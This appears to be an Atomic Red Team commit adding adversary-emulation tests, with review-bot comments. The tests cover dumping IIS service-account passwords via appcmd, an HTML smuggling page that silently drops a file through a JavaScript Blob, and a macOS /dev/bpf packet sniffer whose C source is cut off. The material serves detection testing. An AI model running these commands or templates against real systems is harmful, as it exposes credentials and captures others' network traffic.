## Atomic Test #4 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
|
||||
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
|
||||
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `powershell`!
|
||||
##### Description: IIS must be installed prior to running the test
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
Install-WindowsFeature -name Web-Server -IncludeManagementTools
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #5 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
|
||||
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
|
||||
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 42510244-5019-48fa-a0e5-66c3b76e6049
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `powershell`!
|
||||
##### Description: IIS must be installed prior to running the test
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
Install-WindowsFeature -name Web-Server -IncludeManagementTools
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -104,4 +104,41 @@ atomic_tests:
|
||||
Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
|
||||
- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
|
||||
auto_generated_guid: 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
|
||||
description: |-
|
||||
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
|
||||
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: IIS must be installed prior to running the test
|
||||
prereq_command: if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
|
||||
get_prereq_command: |-
|
||||
Install-WindowsFeature -name Web-Server -IncludeManagementTools
|
||||
executor:
|
||||
command: |-
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
|
||||
auto_generated_guid: 42510244-5019-48fa-a0e5-66c3b76e6049
|
||||
description: |-
|
||||
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
|
||||
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: IIS must be installed prior to running the test
|
||||
prereq_command: if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
|
||||
get_prereq_command: |-
|
||||
Install-WindowsFeature -name Web-Server -IncludeManagementTools
|
||||
executor:
|
||||
command: |-
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
|
||||
name: powershell
|
||||
elevation_required: true
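Review bot: The prerequisite check `if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}` relies on the ServerManager module, which to my knowledge ships only on Windows Server, so on a client build the check errors out and the `Install-WindowsFeature` get-prereq fails the same way; either state in the description that the test is Server-only or add a client fallback such as `if ((Get-WindowsOptionalFeature -Online -FeatureName IIS-WebServer).State -eq "Enabled") {exit 0} else {exit 1}`. A bare `Install-WindowsFeature Web-Server` leaves every application pool on the built-in ApplicationPoolIdentity by default, with no stored password, so on a host prepared only by this prereq `appcmd list apppool /text:*` and `/config` have no credential to reveal; the description should say a pool with a custom identity must already exist, or the prereq should configure one. Neither test has a `cleanup_command`, so the IIS role installed by the prereq stays on the host after the run. The description should also warn that the output contains application pool passwords in clear text, which any execution logging of the test will capture.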
|
||||
|
||||
@@ -0,0 +1,59 @@
|
||||
# T1027.006 - HTML Smuggling
|
||||
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/006)
|
||||
<blockquote>Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
|
||||
|
||||
Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as <code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.
|
||||
|
||||
For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - HTML Smuggling Remote Payload](#atomic-test-1---html-smuggling-remote-payload)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - HTML Smuggling Remote Payload
|
||||
The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without userinteraction.
|
||||
The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 30cbeda4-08d9-42f1-8685-197fad677734
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```powershell
|
||||
PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
$user = [System.Environment]::UserName; Remove-Item -Path C:\Users\$user\Downloads\FeelTheBurn.iso
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `powershell`!
|
||||
##### Description: T1027_006_remote.html must exist on disk at specified at PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if (Test-Path PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html) { exit 0} else { exit 1}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
New-Item -Type Directory "PathToAtomicsFolder\T1027.006\bin\" -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.006/bin/T1027_006_Remote.html" -OutFile "PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html"
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
@@ -0,0 +1,27 @@
|
||||
attack_technique: T1027.006
|
||||
display_name: HTML Smuggling
|
||||
atomic_tests:
|
||||
|
||||
- name: HTML Smuggling Remote Payload
|
||||
auto_generated_guid: 30cbeda4-08d9-42f1-8685-197fad677734
|
||||
description: |
|
||||
The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without userinteraction.
|
||||
The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependencies:
|
||||
- description: |
|
||||
T1027_006_remote.html must exist on disk at specified at PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html
|
||||
prereq_command: |
|
||||
if (Test-Path PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html) { exit 0} else { exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\T1027.006\bin\" -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.006/bin/T1027_006_Remote.html" -OutFile "PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html"
|
||||
executor:
|
||||
command: |
|
||||
PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html
|
||||
cleanup_command:
|
||||
$user = [System.Environment]::UserName;
|
||||
Remove-Item -Path C:\Users\$user\Downloads\FeelTheBurn.iso
|
||||
name: powershell
|
||||
elevation_required: false
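Review bot: The description claims the HTML file downloads the T1553.005 ISO, but the bundled T1027_006_Remote.html only base64-decodes the ISO's URL and saves that text as `FeelTheBurn.iso`, so what lands in Downloads is a few hundred bytes of URL rather than the ISO; either reword to `The HTML file writes a small text file named FeelTheBurn.iso (containing the URL of the T1553.005 ISO) to the user's Downloads folder via a JavaScript Blob.` or change the HTML to carry the real payload. The cleanup path `C:\Users\$user\Downloads\FeelTheBurn.iso` assumes the default profile location; `Remove-Item -Path "$env:USERPROFILE\Downloads\FeelTheBurn.iso" -ErrorAction Ignore` follows redirected profiles and does not error when the browser saved elsewhere or prompted instead. The `dependencies` block has no `dependency_executor_name`, unlike the T1003 tests in this commit; if the runner does not default it to the executor's name, the PowerShell prereq commands may run under the wrong shell, so `dependency_executor_name: powershell` is worth adding explicitly. Whether the save is silent depends on the default browser's download-prompt setting, so "without userinteraction" (a typo for "user interaction") should be hedged.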
|
||||
@@ -0,0 +1,36 @@
|
||||
<!-- Based on the template from Stan Hegt: https://outflank.nl/blog/2018/08/14/html-smuggling-explained/ -->
|
||||
<html>
|
||||
<head>
|
||||
<title>T1027.006 - HTML Smuggling</title>
|
||||
</head>
|
||||
<body>
|
||||
<p>Nothing to see here...</p>
|
||||
|
||||
<script>
|
||||
function convertFromBase64(base64) {
|
||||
var binary_string = window.atob(base64);
|
||||
var len = binary_string.length;
|
||||
var bytes = new Uint8Array( len );
|
||||
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
|
||||
return bytes.buffer;
|
||||
}
|
||||
//Base64 encoded link to https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso
|
||||
var file ='aHR0cHM6Ly9naXRodWIuY29tL3JlZGNhbmFyeWNvL2F0b21pYy1yZWQtdGVhbS9ibG9iL2QwZGFkNjJkYmNhZTljNjBjNTE5MzY4ZTgyYzE5NmEzZGI1NzcwNTUvYXRvbWljcy9UMTU1My4wMDUvYmluL0ZlZWxUaGVCdXJuLmlzbz9yYXc9dHJ1ZQ==';
|
||||
var data = convertFromBase64(file);
|
||||
var blob = new Blob([data], {type: 'octet/stream'});
|
||||
var fileName = 'FeelTheBurn.iso';
|
||||
|
||||
if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
|
||||
else {
|
||||
var a = document.createElement('a');
|
||||
document.body.appendChild(a);
|
||||
a.style = 'display: none';
|
||||
var url = window.URL.createObjectURL(blob);
|
||||
a.href = url;
|
||||
a.download = fileName;
|
||||
a.click();
|
||||
window.URL.revokeObjectURL(url);
|
||||
}
|
||||
</script>
|
||||
</body>
|
||||
</html>
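Review bot: The `file` constant on the `var file =` line is the base64 of the ISO's URL (it decodes to `https://github.com/...FeelTheBurn.iso?raw=true`), so `convertFromBase64(file)` yields the bytes of that URL string and the Blob saved as `FeelTheBurn.iso` is a short text file, not the ISO; the comment above it should say so, e.g. `// Base64 of the ISO's URL; the saved "ISO" is this URL as text, not the image itself`, or the script should embed or fetch the real bytes (fetching from a file:// page depends on the host's CORS headers). The Blob type `'octet/stream'` is not a registered media type; `application/octet-stream` is the conventional value for an opaque binary download. The guard `if(window.navigator.msSaveOrOpenBlob)` tests one legacy IE API and then calls a different one, `msSaveBlob`; pick one, e.g. `if (window.navigator.msSaveBlob) window.navigator.msSaveBlob(blob, fileName);`. The hidden anchor appended to the body is never removed after `a.click()`; `document.body.removeChild(a);` after `revokeObjectURL` keeps the DOM clean.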
|
||||
+108
-2
@@ -12,7 +12,7 @@ In cloud-based environments, adversaries may still be able to use traffic mirror
|
||||
|
||||
- [Atomic Test #1 - Packet Capture Linux](#atomic-test-1---packet-capture-linux)
|
||||
|
||||
- [Atomic Test #2 - Packet Capture macOS](#atomic-test-2---packet-capture-macos)
|
||||
- [Atomic Test #2 - Packet Capture macOS using tcpdump or tshark](#atomic-test-2---packet-capture-macos-using-tcpdump-or-tshark)
|
||||
|
||||
- [Atomic Test #3 - Packet Capture Windows Command Prompt](#atomic-test-3---packet-capture-windows-command-prompt)
|
||||
|
||||
@@ -22,6 +22,10 @@ In cloud-based environments, adversaries may still be able to use traffic mirror
|
||||
|
||||
- [Atomic Test #6 - Windows Internal pktmon set filter](#atomic-test-6---windows-internal-pktmon-set-filter)
|
||||
|
||||
- [Atomic Test #7 - Packet Capture macOS using /dev/bpfN with sudo](#atomic-test-7---packet-capture-macos-using-devbpfn-with-sudo)
|
||||
|
||||
- [Atomic Test #8 - Filtered Packet Capture macOS using /dev/bpfN with sudo](#atomic-test-8---filtered-packet-capture-macos-using-devbpfn-with-sudo)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -73,7 +77,7 @@ if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exi
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Packet Capture macOS
|
||||
## Atomic Test #2 - Packet Capture macOS using tcpdump or tshark
|
||||
Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
|
||||
|
||||
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A.
|
||||
@@ -285,4 +289,106 @@ pktmon filter remove
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #7 - Packet Capture macOS using /dev/bpfN with sudo
|
||||
Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** e6fe5095-545d-4c8b-a0ae-e863914be3aa
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| ifname | Specify interface to perform PCAP on. | String | en0|
|
||||
| csource_path | Path to C program source | String | PathToAtomicsFolder/T1040/src/macos_pcapdemo.c|
|
||||
| program_path | Path to compiled C program | String | /tmp/t1040_macos_pcapdemo|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```bash
|
||||
sudo #{program_path} -i #{ifname} -t 3
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```bash
|
||||
rm -f #{program_path}
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `bash`!
|
||||
##### Description: compile C program
|
||||
##### Check Prereq Commands:
|
||||
```bash
|
||||
exit 1
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```bash
|
||||
cc #{csource_path} -o #{program_path}
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #8 - Filtered Packet Capture macOS using /dev/bpfN with sudo
|
||||
Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** e2480aee-23f3-4f34-80ce-de221e27cd19
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| ifname | Specify interface to perform PCAP on. | String | en0|
|
||||
| csource_path | Path to C program source | String | PathToAtomicsFolder/T1040/src/macos_pcapdemo.c|
|
||||
| program_path | Path to compiled C program | String | /tmp/t1040_macos_pcapdemo|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```bash
|
||||
sudo #{program_path} -f -i #{ifname} -t 3
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```bash
|
||||
rm -f #{program_path}
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `bash`!
|
||||
##### Description: compile C program
|
||||
##### Check Prereq Commands:
|
||||
```bash
|
||||
exit 1
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```bash
|
||||
cc #{csource_path} -o #{program_path}
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -28,7 +28,7 @@ atomic_tests:
|
||||
tshark -c 5 -i #{interface}
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Packet Capture macOS
|
||||
- name: Packet Capture macOS using tcpdump or tshark
|
||||
auto_generated_guid: 9d04efee-eff5-4240-b8d2-07792b873608
|
||||
description: |
|
||||
Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
|
||||
@@ -153,4 +153,72 @@ atomic_tests:
|
||||
cleanup_command: |-
|
||||
pktmon filter remove
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
elevation_required: true
|
||||
- name: Packet Capture macOS using /dev/bpfN with sudo
|
||||
auto_generated_guid: e6fe5095-545d-4c8b-a0ae-e863914be3aa
|
||||
description: |
|
||||
Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: String
|
||||
default: en0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: String
|
||||
default: /tmp/t1040_macos_pcapdemo
|
||||
dependency_executor_name: bash
|
||||
dependencies:
|
||||
- description: |
|
||||
compile C program
|
||||
prereq_command: |
|
||||
exit 1
|
||||
get_prereq_command: |
|
||||
cc #{csource_path} -o #{program_path}
|
||||
executor:
|
||||
command: |
|
||||
sudo #{program_path} -i #{ifname} -t 3
|
||||
cleanup_command: |
|
||||
rm -f #{program_path}
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Filtered Packet Capture macOS using /dev/bpfN with sudo
|
||||
auto_generated_guid: e2480aee-23f3-4f34-80ce-de221e27cd19
|
||||
description: |
|
||||
Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: String
|
||||
default: en0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: String
|
||||
default: /tmp/t1040_macos_pcapdemo
|
||||
dependency_executor_name: bash
|
||||
dependencies:
|
||||
- description: |
|
||||
compile C program
|
||||
prereq_command: |
|
||||
exit 1
|
||||
get_prereq_command: |
|
||||
cc #{csource_path} -o #{program_path}
|
||||
executor:
|
||||
command: |
|
||||
sudo #{program_path} -f -i #{ifname} -t 3
|
||||
cleanup_command: |
|
||||
rm -f #{program_path}
|
||||
name: bash
|
||||
elevation_required: true
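Review bot: Both new tests compile to the fixed, predictable path `/tmp/t1040_macos_pcapdemo` and then run it with `sudo`; /tmp is world-writable with the sticky bit, so another local user who pre-creates that name (or a symlink) before `cc -o` runs can get `cc` to write through the link or have root execute their file — a classic shared-/tmp TOCTOU for anything that is later executed elevated. A default inside the atomics tree, `default: PathToAtomicsFolder/T1040/bin/t1040_macos_pcapdemo` with `mkdir -p "$(dirname "#{program_path}")"` before the `cc` line, or a per-run `mktemp -d` directory, removes the shared path. `prereq_command: exit 1` unconditionally reports the binary missing, so the check never reflects whether compilation actually succeeded; `test -x "#{program_path}"` as the prereq and `cc #{csource_path} -o #{program_path} || exit 1` as the get-prereq make `-CheckPrereqs` meaningful. The descriptions could also say that `-t 3` is only honoured after a packet arrives (the program checks the deadline inside its blocking read loop), so on a quiet interface the test blocks until traffic appears.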
|
||||
|
||||
@@ -0,0 +1,299 @@
|
||||
#include <fcntl.h>
|
||||
#include <getopt.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <sys/errno.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/uio.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#include <arpa/inet.h>
|
||||
#include <net/bpf.h>
|
||||
#include <net/if.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netinet/in.h>
|
||||
|
||||
#define DEFAULT_IFNAME "en0"
|
||||
#define DEFAULT_BUFSIZE 32767
|
||||
|
||||
static const struct option longopts[] = {
|
||||
{ "filter", no_argument, NULL, 'f'},
|
||||
{ "promisc", no_argument, NULL, 'p'},
|
||||
{ "ifname", required_argument, NULL, 'i'},
|
||||
{ "time", required_argument, NULL, 't'},
|
||||
{ 0, 0, 0, 0 }
|
||||
};
|
||||
|
||||
// counters for each protocol seen
|
||||
|
||||
static int64_t gNumTcp = 0;
|
||||
static int64_t gNumUdp = 0;
|
||||
static int64_t gNumIcmp = 0;
|
||||
static int64_t gNumOther = 0;
|
||||
|
||||
static void usage(const char *progname)
|
||||
{
|
||||
printf("usage: %s <options>\n", progname);
|
||||
printf(" -f --filter Set BPF filter to UDP. Default is unfiltered.\n");
|
||||
printf(" -p --promisc Will enable promisc to capture packets not destined for this system.\n");
|
||||
printf(" -i --ifname <interface name> Specify ifname. Default is 'en0'.\n");
|
||||
printf(" -t --time <num seconds> Exit after number of seconds. Default is to run until killed.\n");
|
||||
}
|
||||
|
||||
typedef struct {
|
||||
char interfaceName[16];
|
||||
unsigned int bufferLength;
|
||||
} BpfOption;
|
||||
|
||||
typedef struct {
|
||||
int fd;
|
||||
char deviceName[16];
|
||||
unsigned int bufferLength;
|
||||
unsigned int lastReadLength;
|
||||
unsigned int readBytesConsumed;
|
||||
char *buffer;
|
||||
} BpfSniffer;
|
||||
|
||||
typedef struct {
|
||||
char *data;
|
||||
} CapturedInfo;
|
||||
|
||||
/*
|
||||
* pick next available /dev/bpf<N> device file.
|
||||
* @returns 0 and sets sniffer->fd on success, returns -1 on failure.
|
||||
*/
|
||||
int pick_bpf_device(BpfSniffer *sniffer)
|
||||
{
|
||||
char dev[16] = {0};
|
||||
for (int i = 0; i < 99; ++i) {
|
||||
sprintf(dev, "/dev/bpf%i", i);
|
||||
sniffer->fd = open(dev, O_RDONLY);
|
||||
if (sniffer->fd != -1) {
|
||||
fprintf(stderr, "opened '%s'\n", dev);
|
||||
strcpy(sniffer->deviceName, dev);
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
return -1;
|
||||
}
|
||||
|
||||
/*
|
||||
* Based on https://gist.github.com/c-bata/ca188c0184715efc2660422b4b3851c6
|
||||
*/
|
||||
int new_bpf_sniffer(const char *ifname, BpfSniffer *sniffer, int isBpfFilterEnabled, int isPromiscEnabled)
|
||||
{
|
||||
unsigned int bufferLength = DEFAULT_BUFSIZE;
|
||||
if (pick_bpf_device(sniffer) == -1)
|
||||
return -1;
|
||||
|
||||
// setup packet buffer length
|
||||
|
||||
if (ioctl(sniffer->fd, BIOCSBLEN, &bufferLength) == -1) {
|
||||
perror("ioctl BIOCSBLEN");
|
||||
return -1;
|
||||
}
|
||||
sniffer->bufferLength = bufferLength;
|
||||
|
||||
// specify interface
|
||||
|
||||
struct ifreq interface;
|
||||
strcpy(interface.ifr_name, ifname);
|
||||
if(ioctl(sniffer->fd, BIOCSETIF, &interface) > 0) {
|
||||
perror("ioctl BIOCSETIF");
|
||||
return -1;
|
||||
}
|
||||
|
||||
// immediate packet callback?
|
||||
|
||||
unsigned int enable = 1;
|
||||
if (ioctl(sniffer->fd, BIOCIMMEDIATE, &enable) == -1) {
|
||||
perror("ioctl BIOCIMMEDIATE");
|
||||
return -1;
|
||||
}
|
||||
|
||||
// enable Promisc if enabled
|
||||
|
||||
if (isPromiscEnabled) {
|
||||
printf("Attempting to enable PRMOMISC\n");
|
||||
if (ioctl(sniffer->fd, BIOCPROMISC, NULL) == -1) {
|
||||
perror("ioctl BIOCPROMISC");
|
||||
return -1;
|
||||
}
|
||||
}
|
||||
|
||||
// set a BPF traffic filter if set
|
||||
|
||||
if (isBpfFilterEnabled) {
|
||||
// generated using 'tcpdump -i en0 udp -dd'
|
||||
struct bpf_insn instructions[] = {
|
||||
{ 0x28, 0, 0, 0x0000000c },
|
||||
{ 0x15, 0, 5, 0x000086dd },
|
||||
{ 0x30, 0, 0, 0x00000014 },
|
||||
{ 0x15, 6, 0, 0x00000011 },
|
||||
{ 0x15, 0, 6, 0x0000002c },
|
||||
{ 0x30, 0, 0, 0x00000036 },
|
||||
{ 0x15, 3, 4, 0x00000011 },
|
||||
{ 0x15, 0, 3, 0x00000800 },
|
||||
{ 0x30, 0, 0, 0x00000017 },
|
||||
{ 0x15, 0, 1, 0x00000011 },
|
||||
{ 0x6, 0, 0, 0x00040000 },
|
||||
{ 0x6, 0, 0, 0x00000000 },
|
||||
};
|
||||
struct bpf_program filter = {12, instructions};
|
||||
|
||||
printf("Adding BPF filter to only match 'udp' traffic\n");
|
||||
|
||||
if (ioctl(sniffer->fd, BIOCSETF, &filter) == -1) {
|
||||
perror("ioctl BIOCSETF");
|
||||
return -1;
|
||||
}
|
||||
}
|
||||
|
||||
// finally, allocate buffer and initialize
|
||||
|
||||
sniffer->readBytesConsumed = 0;
|
||||
sniffer->lastReadLength = 0;
|
||||
sniffer->buffer = (char *)malloc(sizeof(char) * sniffer->bufferLength);
|
||||
return 0;
|
||||
}
|
||||
|
||||
int read_bpf_packet_data(BpfSniffer *sniffer, CapturedInfo *info)
|
||||
{
|
||||
struct bpf_hdr *bpfPacket;
|
||||
if (sniffer->readBytesConsumed + sizeof(sniffer->buffer) >= sniffer->lastReadLength) {
|
||||
sniffer->readBytesConsumed = 0;
|
||||
memset(sniffer->buffer, 0, sniffer->bufferLength);
|
||||
|
||||
ssize_t lastReadLength = read(sniffer->fd, sniffer->buffer, sniffer->bufferLength);
|
||||
if (lastReadLength == -1) {
|
||||
sniffer->lastReadLength = 0;
|
||||
perror("read bpf packet:");
|
||||
return -1;
|
||||
}
|
||||
sniffer->lastReadLength = (unsigned int) lastReadLength;
|
||||
}
|
||||
|
||||
bpfPacket = (struct bpf_hdr*)((long)sniffer->buffer + (long)sniffer->readBytesConsumed);
|
||||
info->data = sniffer->buffer + (long)sniffer->readBytesConsumed + bpfPacket->bh_hdrlen;
|
||||
sniffer->readBytesConsumed += BPF_WORDALIGN(bpfPacket->bh_hdrlen + bpfPacket->bh_caplen);
|
||||
return bpfPacket->bh_datalen;
|
||||
}
|
||||
|
||||
int close_bpf_sniffer(BpfSniffer *sniffer)
|
||||
{
|
||||
free(sniffer->buffer);
|
||||
|
||||
if (close(sniffer->fd) == -1)
|
||||
return -1;
|
||||
return 0;
|
||||
}
|
||||
|
||||
